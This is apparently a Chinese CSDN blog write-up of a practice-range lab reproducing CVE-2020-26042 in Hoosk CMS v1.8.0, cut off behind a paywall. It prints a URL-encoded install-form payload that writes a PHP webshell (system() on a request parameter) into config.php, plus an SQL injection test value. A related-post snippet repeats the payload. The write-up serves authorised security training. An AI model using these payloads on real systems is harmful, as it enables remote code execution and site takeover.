[春秋云镜]CVE-2020-26042

春天11-

已于 2022-12-08 18:40:58 修改

阅读量704

点赞数 2

分类专栏：春秋云镜靶场文章标签： web安全安全

于 2022-12-08 18:40:30 首次发布

本文链接：https://blog.csdn.net/niubi707/article/details/128241769

版权

春秋云镜同时被 2 个专栏收录

36 篇文章 2 订阅

订阅专栏

靶场

36 篇文章 2 订阅

订阅专栏

声明：⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤，任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的，否则后果⾃⾏承担。所有渗透都需获取授权！

靶场介绍

Hoosk CMS v1.8.0 install/index.php 存在sql注入漏洞

春秋云镜开启靶场

http://eci-2ze0ryypd38asmkmcnf4.cloudeci1.ichunqiu.com/install/

安装hoosk

payload：

siteName=test&siteURL=http%3A//baidu.com/%27%29%3Bif%28%24_REQUEST%5B%27s%27%5D%29%20%7B%0A%20%20system%28%24_REQUEST%5B%27s%27%5D%29%3B%0A%20%20%7D%20else%20phpinfo%28%29%3Bexit%28%29%3B//&dbName=mysql&dbUserName=root&dbPass=root&dbHost=127.0.0.1

会写入一个一句话木马到config.php

查看首页

执行命令

SQL注入测试

payload：

siteName=',siteTitle=version()#&siteURL=http://baidu.com&dbName=mysql&dbUserName=root&dbPass=root&dbHost=127.0.0.1

关注博主即可阅读全文

优惠劵

春天11-

关注关注

2
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
[春秋云镜]CVE-2020-26042

春秋云镜CVE-2020-26042Hoosk CMS v1.8.0 install/index.php 存在sql注入漏洞
复制链接

扫一扫

专栏目录

cve-2020-14750.zip9（补丁升级）

05-26

2020年11月2日，Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750，此漏洞可以在没有身份验证的情况下进行远程攻击，也就是说，可以在不需要用户名和密码的情况下通过网络...

春秋云镜 CVE-2020-26042

qq_22002773的博客

08-07

152

春秋云镜 CVE-2020-26042

参与评论您还未登录，请先登录后发表或查看评论

CVE-2020-26042漏洞复现

2301_78321656的博客

07-10

1044

靶标介绍： Hoosk CMS v1.8.0 install/index.php 存在sql注入漏洞漏洞复现过程 1.开启靶场 http://eci-2ze0ryypd38asmkmcnf4.cloudeci1.ichunqiu.com/install/ 2.安装hoosk Payload: siteName=test&siteURL=http%3A//baidu.com/%27%29%3Bif%28%24_REQUEST%5B%27s%27%5D%29%20%7B%

【漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721

10-15

1563

【seaCms-命令执行】后门代码写入可解析文件中

[春秋云镜]CVE-2014-3704

niubi707的博客

11-30

790

[春秋云镜]CVE-2014-3704 Drupal是使用PHP语言编写的开源内容管理框架（CMF），它由由内容管理系统和PHP开发框架共同构成，在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖，是基于PHP语言最著名的WEB应用程序。 Drupal 是一款用量庞大的CMS，其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞，攻击者可以执行任意SQL语句，插入、修改管理员信息，甚至执行任意代码。

[春秋云镜]CVE-2018-16509

niubi707的博客

12-02

5274

春秋云镜CVE-2018-16509GhostScript 的安全沙箱可以被绕过，通过构造恶意的图片内容，将可以造成命令执行、文件读取、文件删除等漏洞。 Python 中处理图片的模块 PIL（Pillow），因为其内部调用了 GhostScript 而受到 CVE-2018-16509的影响

CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE

05-29

描述CVE-2020-36179：2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180：FasterXML jackson-...

cve-2020-2551_poc.py

03-12

cve-2020-2551_poc.py

CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md

04-11

CVE-2020-21224 ClusterEngineV4.0 远程代码执行

SAP_RECON:CVE-2020-6287，CVE-2020-6286的PoC（SAP RECON漏洞）

04-01

CVE-2020-6287，CVE-2020-6286的PoC（SAP RECON漏洞） ff！ RECON（NetWeaver上的可远程利用代码）？伙计们，真的吗？那是您想到的最好的代号？ :) 此脚本可检查SAP LM配置向导是否缺少授权检查漏洞，并且PoC...

三虎企业建站系统(3hooCMS) v3.0 SP2.rar

07-05

一年没有更新这个程序,一直在想写新版的V4,但是由于本人工作原因一直没有静心的时间下来写,这段离职后把原来的程序进行了彻底的改进,对一年以来累积的问题进行了整理和修正,包括一些细节与安全问题。本程序承诺免费与完整无限制，源码无任何部分加密，已经经过了时间的考验。感谢大家几年来的支持。以下为本次改进功能 2012年8月17日 04:01:18 封包前改进功能 1,升级编辑器到最新版KindEditor 4.1.2 (2012-07-21),支持批量上传,再次检查上传类是否有安全问题 2,升级广告幻灯插件到myFocus2.0,新增加3种幻灯类型 3,清理后台无用文件及目录 4,增加邮件发送设置,可以选择留言,订单,自定义表单,应聘,会员注册信息单独发送到邮箱. 5,解决一个BUG，列表页无法调用二级分类产品问题，并优化一个主SQL查询语句。 6，增加反映比较多的新闻图片调用例子在默认模版。 7，免费模版问题，将以后更新在官网提供下载，不在附带在程序内为互联网制造太多无用文件。 8,增加默认文档default.asp,方便那种无法设置默认文档的空间的使用。 2012年6月2日 22:29:46 之前改进功能 1,修正一个安全问题,来自搜索未过滤.增加后台危险提示,提示必须更改后台帐号密码及后台管理目录 2,修正一个安全问题,来自后台备份表单,已经改成后台备份无表单 3,删掉一个无用功能,后台图片管理,因为新编辑器已经采用日期文件夹模式 4,更新编辑器到kindeditor4.05,4.06才发布,暂不升级 5,更换上传为批量上传,就是在浏览选图界面可以全选,方便一次上传多图图集等. 6,增加自定义表单一个,除标题外都可以自己在后台定义,以方便服务型企业使用作为在线报名在线订房等作用. 7,更改后台UI,最后一次使用框架式后台,禁止掉非IE内核浏览器进后台,并有提示! 8,全面清理所有前台标签,并制作详细的标签调用说明书. 9,增加google地图功能 10,改进气泡提示,全面增加表单填写提示功能 11,修复默认全功能调用模版搜索功能 12,修复下来菜单被广告遮住功能 13,清理默认附带的上传附件,演示全改用直接外链官网,所有附带附件仅3张小图片,确保建站前无需清理附件目录 2012年5月1日之前改进功能 1,改进上传类,该缩略的缩略,不处理的不处理!后台如使用缩略图的请重新设置!banner 和广告不会缩略图片,是多大就上传多大的上去! OK 2,增加广告后台管理功能,调用请查看后台帮助 OK 3,修正人才首页调用标签 OK 4,修正留言首页调用标签,分别添加标题字数内容字数回复字数限制来显示调用的高度!增加排序参数! OK 5,修正弹出层的显示效果,订购留言等弹出层采用百分比高度,不会再因为小浏览器而遮住按钮 OK 6,重写后台管理栏目,采用下拉菜单.方便集中管理. OK 7,修复一个逻辑错误,关于二级分类应用的. OK 8,修正人才列表内容部分语言包调用错误而多几个招聘标题的问题 OK 9,修正图集显示方式,不再用弹出层显示;OK 10,组合幻灯标签,幻灯标签里面加上新闻="1" 即可调用新闻频道的幻灯! OK 11,修正生成方式,支持设定生成时间间隔和支持单次生成多少条!OK 12,修复一个后台IE6才会出现的可能误操作逻辑错误! OK 13,集成标签调用参数帮助在后台!以及少量的操作帮助!OK 14,修正订单发送邮件E-MAIL参数遗漏;OK 已知但不属于功能故障的BUG 在上传弹出窗口未正常上传而关闭会造成JS无回调参数而报错. 正式封包，比预计发布时间多出4天默认管理员帐号密码帐号 admin 密码 3hoocms 近段将开放论坛，请有问题反馈到论坛。有BUG可以直接发邮件，属于确实程序问题，或改进建议的来信必复。官方同步更新了一定量的模版，请有需要及有经济实力的朋友给予一定支持，后台集成了支付宝捐助按钮，同样，接受任何捐助，三虎感激不尽。自带伪静态规则为3.X版本,2.X还未编写! 升级程序到时候届时会给予在论坛提供！

sir的matlab代码-Hoosk:HooskCodeigniterCMS

05-26

先生的matlab代码霍斯克 Hoosk是内置于CodeIgniter中的轻量级，以用户为中心的内容管理系统（CMS），可用于轻松创建时尚的响应式网站！现场演示在尝试现场演示文献资料我将开始向Wiki添加一些文档和指南以进行安装，使用系统，创建主题等。单击顶部的“ Wiki”选项卡，或者如果您懒惰也可以使用以下链接：入门先进的注意：我仍在编写更多文档页面，因此请稍后再检查学分我在Hoosk中使用过的插件和库： CI进纸- 响应式文件管理器- 特雷弗爵士- Sioen Sir Trevor PHP转换器- Michelf PHP Markdown- jQuery日期选择器- 可嵌套- 引导程序- CodeIgniter- Fontawesome- sb-admin- Hoosk已使用BrowserStack经过跨浏览器测试。 BrowserStack提供对多个桌面和移动浏览器的即时访问，请查看！ --

PHPOKCMS 4.9.015版本存在文件上传漏洞（ CNVD-2018-17547）

千寻的博客

05-06

1945

0x01 简介 PHPOK从2005年开发至今15年，是一款高效的网站建设内容管理系统，实现高定制化的开源免费建站cms 系统，百万数据量级网站平台建设，包括企业网站，电子商务平台及各种小程序和公众号平台建设 0x02 漏洞概述 phpok是一套采用PHP+MySQL开发的企业网站系统，其4.8.338及4.9.015版本存在任意文件上传漏洞，攻击者可利用漏洞上传任意文件，获取网站权限。 0x03 漏洞编号 https://www.cnvd.org.cn/flaw/show/CNVD-2018-

CTF网络安全大赛简单web题目：eval

Pythonit教程网

05-17

970

（错误控制运算符）等可能引发安全问题的函数。这个PHP脚本有几个关键部分，但首先，它是不安全的，因为使用了。红客网：blog.hongkewang.cn。只需要在web的url后面加上参数“题目来源于：bugku。一道简单web的题目。

常见web安全漏洞

qq_52712762的博客

05-24

1112

管理员备份网站文件后错误的将备份放在Web目录下，有:.rar、.zip、.7z、.tar、.tar.gz、.bak、.txt。使用” ../”测试，/var/www/images/../../../etc/passwd等价于/etc/passwd。③Web网站的程序编写存在问题，对用户提交请求没有进行适当的过滤，直接使用用户提交上来的。Web中间件，介于操作系统和应用程序之间的产品，面向信息系统交互，集成过程中的通用部分的。然后，将仔细研究网站的响应，以尝试找出有趣的。

web安全渗透测试工具篇（二）：sqlmap常用命令和nmap常用命令

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交